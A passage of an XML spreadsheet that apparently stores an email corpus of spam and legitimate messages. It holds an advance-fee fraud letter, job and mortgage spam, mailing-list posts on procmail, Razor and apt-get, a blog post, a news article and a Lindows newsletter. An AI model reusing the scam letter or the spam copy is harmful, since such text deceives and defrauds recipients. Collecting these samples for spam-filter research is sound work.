 THE NEXT OF KIN IN DEPOSIT OF THE FUND. HE ALSO EXPLAINED TO ME THAT
 IT WAS BECAUSE OF THIS WEALTH THAT HE WAS POISONED BY HIS  BUSINESS
 ASSOCIATES. THAT I SHOULD SEEK FOR A FOREIGN PARTNER IN  A COUNTRY OF
 MY CHOICE WHERE I WILL TRANSFER THIS MONEY AND USE IT FOR INVESTMENT
 PURPOSE.  
 PLEASE, I AM SINCERELY ASKING FOR YOUR ASSISTANCE IN THE FOLLOWING
 WAYS:  
 1.TO PROVIDE A BANK ACCOUNT WHERE THIS MONEY WOULD BE TRANSFERRED TO.  
 2.TO SERVE AS THE GUARDIAN OF THIS FUND SINCE I AM A BOY OF 22 YEARS.  
 3.TO MAKE ARRANGEMENT FOR ME TO COME OVER TO YOUR COUNTRY AFTER THE
 MONEY HAS BEEN TRANSFERRED.  
 MOREOVER SIR, I AM WILLING TO OFFER YOU 15% OF THE TOTAL SUM AS
 COMPENSATION FOR YOUR EFFORT/INPUT AFTER THE SUCCESSFUL TRANSFER OF
 THIS FUND TO YOUR NOMINATED ACCOUNT OVERSEAS.  
 FURTHERMORE, YOU SHOULD INDICATE YOUR OPINION TOWARDS ASSISTING ME AS
 I BELIEVE THAT THIS TRANSACTION WOULD BE CONCLUDED WITHIN SEVEN (7)
 DAYS YOU SIGNIFY YOUR INTEREST TO ASSIST ME.  
 I WILL APPRECIATE YOU CALL ME ON + 225 0771 1719 BEFORE SENDING ME
 YOUR REPLY.  
 ANTICAIPTING TO HEARING FROM YOU SOON.  
 THANKS AND GOD BLESS.  
 KONE BAKAR
 TEL: + 225 0771 1719.
 -- 
 __________________________________________________________
 Sign-up for your own FREE Personalized E-mail at Mail.com
 http://www.mail.com/?sr=signup
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SA] Job Update
</t>
  </si>
  <si>
    <t xml:space="preserve">This is the worst job market we've seen in over 30 years.  
 The recent corporate scandals have further deepened the lack 
 confidence in our economy and the plunging stock market that
  is in the headlines this week will lead to additional layoffs creating 
 an EVEN MORE DIFFICULT JOB MARKET.
 Finding a job in today's market is a whole new ballgame.  
 Blasting your resume to thousands of recruiters, posting your
 resume to job boards and responding to job postings and
 advertisements works for only 5% of the job seekers using
 these techniques.
 Job searching based upon the tried and true process and 
 techniques used by recruiting professionals works for 85%.  
 It's a no-brainer.  Invest $19.95 + shipping/handling
 (fully tax-deductible) in the Get Hired Now Program.
 Our CD program will teach you EVERYTHING you need to know
 to quickly succeed in ANY job market.
 Get Hired Now teaches a full job search process - proactive techniques 
 and insider tips used by senior staffing professionals who have spent 
 over 20 years getting people hired.
 Call us toll free at 800-500-0406.
 Mention this email and get a FREE JOB SEARCH WORKBOOK
 ** We accept Visa, MasterCard and American Express!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</si>
  <si>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This is a multi-part message in MIME format.
 It has been signed conforming to RFC3156.
 You'll need GPG or PGP to check the signature.
 ------------=_1034191516-429-0
 Content-Type: text/plain; charset=us-ascii
 On Wed, 09 Oct 2002 14:43:32 EDT, Kevin Kenny writes:
 &gt;&gt; 3)  You can learn to use procmail,
 &gt;Can this be done via .forward?
 make your .forward contain only the following line:
 "|/usr/bin/procmail"
  (incl. the quotes, your procmail binary may be in another path)
 cheers,
 &amp;rw
 -- 
 -- For a list of points detailing how technology
 -- has failed to improve our lives, please press 3.                         
 ------------=_1034191516-429-0
 Content-Type: application/pgp-signature; name="signature.ng"
 Content-Disposition: inline; filename="signature.ng"
 Content-Transfer-Encoding: 7bit
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.2.0 (GNU/Linux)
 iD8DBQE9pIKcE0NzSJr53oIRArv6AJ0dnw3zse1X3xC/afguHB90HFC0qwCeIINr
 kuoZSln0mfGwGUgMRSprbgk=
 =1urd
 -----END PGP SIGNATURE-----
 ------------=_1034191516-429-0--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: 6.25 30 YR Fixed Home Loan, No Points ucq
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="539" border="0" style="border:12px double #006600; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="4" height="423"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-collapse: collapse" bordercolor="#111111"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#000000"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Dear 
               Homeowner,&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
 &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;
               *&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000"&gt;6.25% 
               30 Yr Fixed Rate Mortgage&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font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
             &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="504" border="0" style="position: relative; border-collapse: collapse" bordercolor="#111111" height="1"&gt;
           &lt;tr&gt;
             &lt;td vAlign="top" width="325" height="1"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;br&gt;
               &lt;/a&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=b36"&gt;Click Here for a Free Quote!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=A11"&gt;
               &lt;/a&gt;
             &lt;/div&gt;
             &lt;p&gt;&lt;b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Lock 
             In YOUR LOW FIXED RATE TODAY&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;dl&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;NO 
               COST OUT OF POCKET&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;NO 
               OBLIGATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;FREE 
               CONSULTATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;ALL 
               CREDIT GRADES ACCEPTED&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
             &lt;/dl&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana,Arial,Helvetica,sans-serif" color="red" size="2"&gt;
               &lt;b&gt;
               &lt;a href="http://66.231.133.63/index.html?ID=b36"&gt;Rates as low as 
               6.25% won't stay this low forever CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               &lt;b&gt;
             &lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;
               * based on mortgage rate as of 5-15-02 as low as 6.25% see lender 
               for details&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td vAlign="top" width="4" height="1"&gt;
             &lt;div align="right"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width="175" height="1" bgcolor="#FFFFFF" bordercolor="#006600"&gt;
             &lt;h1&gt;&lt;span style="vertical-align: middle"&gt;
             &lt;font face="Webdings" style="font-size: 200" color="#006600"&gt;
             &lt;a href="http://66.231.133.63/index.html?ID=b36"&gt;
             &lt;font color="#006600"&gt;H&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/h1&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="472" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64"&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Apply 
                 now and one of our lending partners will get back to you within 
                 48 hours.&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;&lt;/td&gt;
                 &lt;/font&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.63/index.html?ID=b36"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
             &lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;To Be Removed Please &amp;quot;&lt;a href="http://66.231.133.63/final/index_remoov.html?ID=b36"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: More fun with the PTC
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85378428
 Date: Not supplied
 I received some feedback in email (from several of you actually) regarding my 
 earlier blog about the Parents Television Council[1], which recently published 
 a report in which they labeled Buffy as the worst show on television for 
 children. Let me clarify why this organization bothers me so much.
 Buffy as a show is clearly inappropriate for children under 12, and a game like 
 GTA3 is as well. The PTC, however, has a clear agenda that goes beyond simply 
 warning parents about the dangers of television shows or video games. There is 
 a belief on the part of the PTC that the hour from 8-9pm (the first hour of 
 primetime) must be designated a family hour, and that no offensive shows should 
 air during that time. I don't believe that it's the networks' responsibility to 
 restrict the kind of content aired during a particular hour of television. The 
 shows that air during primetime run the gamut; some are family-oriented and 
 some aren't. There is, however, no shortage of suitable content should parents 
 and children wish to watch TV together during this hour.
 It should be the parent's responsibility to police a child's television 
 viewing. If you don't want your kids watching _Buffy the Vampire Slayer_, then 
 don't let them, but don't campaign to have the show removed from the air or 
 shoved into a late hour that would only result in its cancellation just because 
 you don't like its content. If you don't think a show is appropriate, don't let 
 your kids watch it.
 The PTC also seems to find shows offensive that are family-oriented. An example 
 of one such show is _Malcolm in the Middle_. I would hardly call this show 
 inappropriate for kids. Apparently the only shows that the PTC deems 
 appropriate are those that have been sanitized to match their 
 ultra-conservative agenda. Even then, I wouldn't really mind, but the idea that 
 all other shows must be relegated to some later hour is just ludicrous.
 [1] http://www.parentstv.org/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYTimes.com Article: Some Friends, Indeed, Do More Harm Than Good
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
 has been sent to you by khare@alumni.caltech.edu.
 Sure does explain FoRK :-)
 not yet abandoned,
   Rohit
 khare@alumni.caltech.edu
 Some Friends, Indeed, Do More Harm Than Good
 September 10, 2002
 By MARY DUENWALD 
 Friends are supposed to be good for you. In recent years,
 scientific research has suggested that people who have
 strong friendships experience less stress, they recover
 more quickly from heart attacks and they are likely to live
 longer than the friendless. They are even less susceptible
 to the common cold, studies show. 
 But not all friends have such a salutary effect. Some lie,
 insult and betray. Some are overly needy. Some give too
 much advice. Psychologists and sociologists are now calling
 attention to the negative health effects of bad friends. 
 "Friendship is often very painful," said Dr. Harriet
 Lerner, a psychologist and the author of "The Dance of
 Connection." "In a close, enduring friendship, jealousy,
 envy, anger and the entire range of difficult emotions will
 rear their heads. One has to decide whether the best thing
 is to consider it a phase in a long friendship or say this
 is bad for my health and I'm disbanding it." 
 Another book, "When Friendship Hurts," by Dr. Jan Yager, a
 sociologist at the University of Connecticut at Stamford,
 advises deliberately leaving bad friends by the wayside.
 "There's this myth that friendships should last a
 lifetime," Dr. Yager said. "But sometimes it's better that
 they end." 
 That social scientists would wait until now to spotlight
 the dangers of bad friends is understandable, considering
 that they have only recently paid close attention to
 friendship at all. Marriage and family relationships -
 between siblings or parents and children - have been seen
 as more important. 
 Of course, troubled friendships are far less likely to lead
 to depression or suicide than troubled marriages are. And
 children are seldom seriously affected when friendships go
 bad. 
 As a popular author of relationship advice books, Dr.
 Lerner said, "Never once have I had anyone write and say my
 best friend hits me." 
 Dr. Beverley Fehr, a professor of psychology at the
 University of Winnipeg, noted that sociological changes,
 like a 50 percent divorce rate, have added weight to the
 role of friends in emotional and physical health. 
 "Now that a marital relationship can't be counted on for
 stability the way it was in the past, and because people
 are less likely to be living with or near extended family
 members, people are shifting their focus to friendships as
 a way of building community and finding intimacy," said Dr.
 Fehr, the author of "Friendship Processes." 
 Until the past couple of years, the research on friendship
 focused on its health benefits. "Now we're starting to look
 at it as a more full relationship," said Dr. Suzanna Rose,
 a professor of psychology at Florida International
 University in Miami. "Like marriage, friendship also has
 negative characteristics." 
 The research is in its infancy. Psychologists have not yet
 measured the ill effects of bad friendship, Dr. Fehr said.
 So far they have only, through surveys and interviews,
 figured out that it is a significant problem. The early
 research, Dr. Fehr added, is showing that betrayal by a
 friend can be more devastating than experts had thought. 
 How can a friend be bad? Most obviously, Dr. Rose said, by
 drawing a person into criminal or otherwise ill-advised
 pursuit. "When you think of people who were friends at
 Enron," she added, "you can see how friendship can support
 antisocial behavior." 
 Betrayal also makes for a bad friendship. "When friends
 split up," said Dr. Keith E. Davis, a professor of
 psychology at the University of South Carolina, "it is
 often in cases where one has shared personal information or
 secrets that the other one wanted to be kept confidential."
 Another form of betrayal, Dr. Yager said, is when a friend
 suddenly turns cold, without ever explaining why. "It's
 more than just pulling away," she said. "The silent
 treatment is actually malicious." 
 At least as devastating is an affair with the friend's
 romantic partner, as recently happened to one of Dr.
 Lerner's patients. "I would not encourage her to hang in
 there and work this one out," Dr. Lerner said. 
 A third type of bad friendship involves someone who insults
 the other person, Dr. Yager said. One of the 180 people who
 responded to Dr. Yager's most recent survey on friendship
 described how, when she was 11, her best friend called her
 "a derogatory name." The woman, now 32, was so devastated
 that she feels she has been unable to be fully open with
 people ever since, Dr. Yager said. 
 Emotional abuse may be less noticeable than verbal abuse,
 but it is "more insidious," Dr. Yager said. "Some people
 constantly set up their friends," she explained. "They'll
 have a party, not invite the friend, but make sure he or
 she finds out." 
 Risk takers, betrayers and abusers are the most extreme
 kinds of bad friends, Dr. Yager said, but they are not the
 only ones. She identifies 21 different varieties. Occupying
 the second tier of badness are the liar, the person who is
 overly dependent, the friend who never listens, the person
 who meddles too much in a friend's life, the competitor and
 the loner, who prefers not to spend time with friends. 
 Most common is the promise breaker. "This includes everyone
 from the person who says let's have a cup of coffee but
 something always comes up at the last minute to someone who
 promises to be there for you when you need them, but then
 isn't," Dr. Yager said. 
 Some friendships go bad, as some romantic relationships do,
 when one of the people gradually or suddenly finds reasons
 to dislike the other one. 
 "With couples, it can take 18 to 24 months for someone to
 discover there's something important they don't like about
 the other person," said Dr. Rose of Florida International.
 "One might find, for example, that in subtle ways the other
 person is a racist. In friendships, which are less intense,
 it may take even more time for one person to meet the
 other's dislike criteria." 
 Whether a friendship is worth saving, Dr. Lerner said,
 "depends on how large the injury is." 
 "Sometimes the mature thing is to lighten up and let
 something go," she added. "It's also an act of maturity
 sometimes to accept another person's limitations." 
 Acceptance should come easier among friends than among
 spouses, Dr. Lerner said, because people have more than one
 friend and do not need a full range of emotional support
 from each one. 
 But if the friendship has deteriorated to the point where
 one friend truly dislikes the other one or finds that the
 friendship is causing undue stress, the healthy response is
 to pull away, Dr. Yager said, to stop sharing the personal
 or intimate details of life, and start being too busy to
 get together, ever. 
 "It takes two people to start and maintain a friendship,
 but only one to end it," Dr. Yager said. 
 Friendship, because it is voluntary and unregulated, is far
 easier to dissolve than marriage. But it is also
 comparatively fragile, experts say. Ideally, the loss of a
 bad friendship should leave a person with more time and
 appreciation for good ones, Dr. Lerner said. 
 "It is wise to pay attention to your friendships and have
 them in order while you're healthy and your life and work
 are going well," she said. "Because when a crisis hits,
 when someone you love dies, or you lose your job and your
 health insurance, when the universe gives you a crash
 course in vulnerability, you will discover how crucial and
 life-preserving good friendship is."
 http://www.nytimes.com/2002/09/10/health/psychology/10FRIE.html?ex=1032684795&amp;ei=1&amp;en=2a88a6d1b985c977
 HOW TO ADVERTISE
 ---------------------------------
 For information on advertising in e-mail newsletters 
 or other creative advertising opportunities with The 
 New York Times on the Web, please contact
 onlinesales@nytimes.com or visit our online media 
 kit at http://www.nytimes.com/adinfo
 For general information about NYTimes.com, write to 
 help@nytimes.com.  
 Copyright 2002 The New York Times Company
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] What's wrong with the Razor servers now?
</t>
  </si>
  <si>
    <t xml:space="preserve">It's still doing it.  I reported a message as spam 10 minutes ago and
 the check keeps coming back false.  What's funny is that message that
 I'm testing with it the sample-spam.txt message from SpamAssassin and I
 know it's been reported before.
 -----Original Message-----
 From: Vipul Ved Prakash [mailto:mail@vipul.net] 
 Sent: Wednesday, August 07, 2002 3:45 AM
 To: Rose, Bobby
 Cc: ML-razor-users
 Subject: Re: [Razor-users] What's wrong with the Razor servers now?
 Hi,
 We were rolling out changes to TeS and catalogue servers over the last
 two days. Any glitches you might have experienced would have been due to
 the upgrades. The upgrades are now complete, and things are back to
 normal. Several new features in TeS will provide better accuracy,
 specially with regards to false-positives.
 cheers,
 vipul.
 On Tue, Aug 06, 2002 at 06:54:04PM -0400, Rose, Bobby wrote:
 &gt; I'm still seeing this.  It reports to honor.cloudmark.com but checks 
 &gt; against apt.cloudmark.com.  What is the sync delay between these 
 &gt; boxes?
 &gt; 
 &gt; -----Original Message-----
 &gt; From: Rose, Bobby
 &gt; Sent: Monday, August 05, 2002 2:05 PM
 &gt; To: ML-razor-users
 &gt; Subject: [Razor-users] What's wrong with the Razor servers now?
 &gt; 
 &gt; 
 &gt; I noticed a low count of razor'd spam messages. So after digging, if I
 &gt; razor-report a message the diags say that it was accepted but if I 
 &gt; turn around and run a check on the exact same message that was 
 &gt; reported, then it doesn't find the sig and as such isn't spam.
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf 
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf 
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net 
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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</si>
  <si>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Subject: Re: problems with apt update
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Mark wrote :
 &gt; Hiya, I always seem to get errors when I do an "apt update", is this a 
 &gt; problem on the repository itself, or on my end, or possibly a timeout in 
 &gt; the connection due to my connection being a crappy modem?
 &gt; 
 &gt; [root@spawn root]# apt-get update
 &gt; Hit http://apt.nixia.no redhat/7.2/i386/base/pkglist.gnomehide
 &gt; Hit http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.os
 &gt; Ign http://apt.freshrpms.net redhat/7.2/i386 release.os
 &gt; Err http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.updates
 &gt;   Bad header line
 &gt; Hit http://apt.freshrpms.net redhat/7.2/i386 release.updates
 &gt; Err http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.freshrpms
 &gt;   400 Bad Request
 &gt; Err http://apt.freshrpms.net redhat/7.2/i386 release.freshrpms
 &gt;   Bad header line
 &gt; Hit http://apt.freshrpms.net redhat/7.2/i386/base/srclist.freshrpms
 &gt; Ign http://apt.nixia.no redhat/7.2/i386 release.gnomehide
 &gt; Ign http://apt.nixia.no redhat/7.2/i386/base/mirrors
 &gt; Hit http://apt.freshrpms.net redhat/7.2/i386 release.freshrpms
 [...]
 It works for me (it should works with or without the "en" subdirectory).
 Does it always give you the same error each time? Do you use an proxy
 server?
 [root@python root]# apt-get update
 Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.os
 Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.os
 Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.updates
 Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.updates
 Get:1 http://apt.freshrpms.net redhat/7.2/en/i386/base/pkglist.os [1035kB]
 Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.os
 Get:2 http://apt.freshrpms.net redhat/7.2/en/i386/base/pkglist.updates
 [331kB] Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.updates
 Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/pkglist.freshrpms
 Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.freshrpms
 Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.os
 Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.os
 Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.updates
 Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.updates
 Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.freshrpms
 Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.freshrpms
 Ign http://apt.freshrpms.net redhat/7.2/en/$(ARCH)/base/mirrors
 Ign http://apt.freshrpms.net redhat/7.2/en/$(ARCH)/base/mirrors
 Ign http://apt.freshrpms.net redhat/7.2/en/$(ARCH)/base/mirrors
 Fetched 1366kB in 1m16s (17.9kB/s)
 Processing File Dependencies... Done
 Reading Package Lists... Done       
 Building Dependency Tree... Done
 W: http://apt.freshrpms.net/ will not be authenticated.
 W: http://apt.freshrpms.net/ will not be authenticated.
 W: http://apt.freshrpms.net/ will not be authenticated.
 [root@python root]#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</si>
  <si>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Lindows.com: Michael's Minute: Lindows.com Report Card
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_LINDOWS_1890362a5620f32f969ae58b8fe2ef84
 Content-Type: text/plain;
 	charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 If this message is not displaying properly, click
 &lt;http://lindows.com/mm&gt; here to launch it in your browser.
 &lt;http://lindows.com/&gt; 
 Michael's Minute: 
 Lindows.com Report Card 
 As summer arrives, many school children are coming home with their
 report cards.  I thought this would be a good time to see what kind of
 grades Lindows.com received for their first 9 months in operation..
 &lt;http://lindows.com/timeline&gt; 
 To view the Timeline of Lindows.com's first 9 months in business, click
 here &lt;http://lindows.com/timeline&gt; . 
 Operating System:  
 As of last week, consumers can experience LindowsOS in one of two ways.
 One way is to buy a computer running LindowsOS from Walmart.com
 &lt;http://www.lindows.com/walmart&gt; , for as little as $299. This is a
 significant milestone for us, as we've partnered with our first builder
 (Microtel) and retailer (Walmart). These computers work great out of the
 box and are ideal for general purpose computing tasks. 
 For those who already have a computer and also wish to try LindowsOS, we
 offer the Insider program &lt;http://www.lindows.com/signup&gt; . This gives
 people wanting early access to LindowsOS a chance to try out LindowsOS
 as it develops. Currently, Insiders report installation success about
 80%  of the time on their PCs. Therefore we have some room to grow,
 consequently, this product is not yet for everyone. 
 Some may wonder how we can sell a computer at Walmart
 &lt;http://www.lindows.com/walmart&gt; when the program available directly
 from Lindows.com is billed as not completely ready. The difference is
 the Walmart &lt;http://www.lindows.com/walmart&gt;  computers are certified,
 ensuring that all components  work elegantly with LindowsOS. That's much
 different than offering a software program that will work on any
 computer in the world - that's very difficult. It's the difference
 between making a single pair of shoes for a known foot size versus
 opening a shoe store with every style of shoe for every size foot. The
 first one is easy, the second one is a much bigger job.
 While the installer is fantastically easy and fast (the entire OS
 installs in under 5 minutes), we've got a lot more work to do to support
 a wider range of hardware, printers and other devices. Grade:  B
   _____  
 Software: 
 Our goal to give people choice means giving them choice not just on
 their operating system, but access to all the programs they'll want to
 add to their computer to really make it work for them in their school,
 home or business.
 Click-N-Run &lt;http://www.lindows.com/clicknrun&gt;  is the easiest way to
 load software onto a computer. For the first time a Linux based system
 has leapt ahead of Microsoft's operating systems in ease of use. With
 1,000 plus programs already in the Click-N-Run Warehouse
 &lt;http://www.lindows.com/warehouse&gt; , users can find quality software
 titles for just about any computing task and, with a single mouse-click
 download, install and run these programs. All these titles are included
 in the $99. This is a fantastic consumer experience and price point.
 Look for a lot more great software in the Warehouse in the future.
 Grade: A-
   _____  
 Microsoft Windows Compatibility:
 We live in a Microsoft world, so there needs to be a bridge from the
 legacy world to the broadband LindowsOS world. This means we need to
 support some bridge programs, file types and network devices to help
 people interact with the legacy Microsoft world. LindowsOS computers
 come with software to view, print and copy popular Microsoft
 applications like: MS Word files, MS PowerPoint files and MS Excel
 documents. There's great Linux based alternatives and we'll guide people
 to those alternatives (they're better than most people realize). To edit
 Microsoft files, we'd highly recommend one of the office suites in our
 Warehouse such as OpenOffice
 &lt;http://www.lindows.com/lindows_products_details.php?id=8966&gt; . 
 Many of these programs are of very high-quality and a great value since
 they're included in the Warehouse &lt;http://www.lindows.com/warehouse&gt; .
 Sometimes there are no viable alternatives for those programs, so we're
 investing necessary resources to support some Microsoft Windows based
 programs. Stay tuned for more developments in this area. Our printer
 support is ok, but there's lots of room for more drivers. Connecting to
 MS Windows based file servers is still a challenge. We need to get
 better in the above areas.  Grade: B 
   _____  
 Communication:
 We've tried to be diligent in communicating where our company is going
 which is why there's typically a weekly Michael's Minute
 &lt;http://www.lindows.com/mm&gt; . While our overall goal has not deviated -
 Bringing Choice To Your Computer - our implementation has become more
 focused as we listened to what our Insiders and potential customers have
 told us. (Keep sending me your comments.) We have been de-emphasizing
 running Microsoft Windows programs because many of you told us you
 detest spending hundreds of dollars on individual software programs,
 forced upgrades and activation codes. It's not just the operating
 system, but costly Microsoft programs you're wanting to avoid. 
 Consequently, we've been emphasizing Click-N-Run because it will change
 the way you think about software. Having a neatly categorized library
 &lt;http://www.lindows.com/warehouse&gt;  of 1,000+ software titles all for a
 flat annual fee at your digital fingertips is an entirely new way to
 think about paying for software. It's immediate, elegant and affordable.
 There are lots of mischaracterizations about Lindows.com swirling around
 - which happens when you have a small organization which can't address
 every question or publication. We'll do a better job of addressing these
 in the future. For now, I wrote up answers to the Top Myths about
 Lindows.com. Check them out by visiting: www.lindows.com/myths  Grade:
 B+
   _____  
 Overall: B+
 Michael Robertson
 Please visit support.lindows.com &lt;http://support.lindows.com/&gt;  to
 answer questions you may have about LindowsOS or Lindows.com.
 Bringing Choice to Your Computer! 
 LindowsOS is presently available on LindowsOS Certified Computers being
 offered from Lindows.com  &lt;http://www.lindows.com/builder&gt; Builder
 partners.  The General Release of LindowsOS (available now for download
 and preview to Lindows.com  &lt;http://lindows.com/signup&gt; Insider
 partners) will be made available later this year for those wishing to
 install and run LindowsOS on their existing computer hardware.  The
 General Release version will support a wider range of computer hardware
 and includes unique features such as a "Friendly-Install" alongside an
 existing MicrosoftR Windows operating system, a streamlined installation
 process which requires no computer knowledge, and the ability to run a
 select set of "bridge" Windows-compatible programs. For more information
